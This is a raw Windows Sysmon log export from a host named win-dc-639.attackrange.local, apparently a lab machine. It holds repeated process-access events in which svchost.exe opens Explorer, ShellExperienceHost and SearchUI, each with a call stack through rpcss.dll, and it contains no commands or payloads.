08:03:39.176{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.176{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.175{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.174{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.173{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 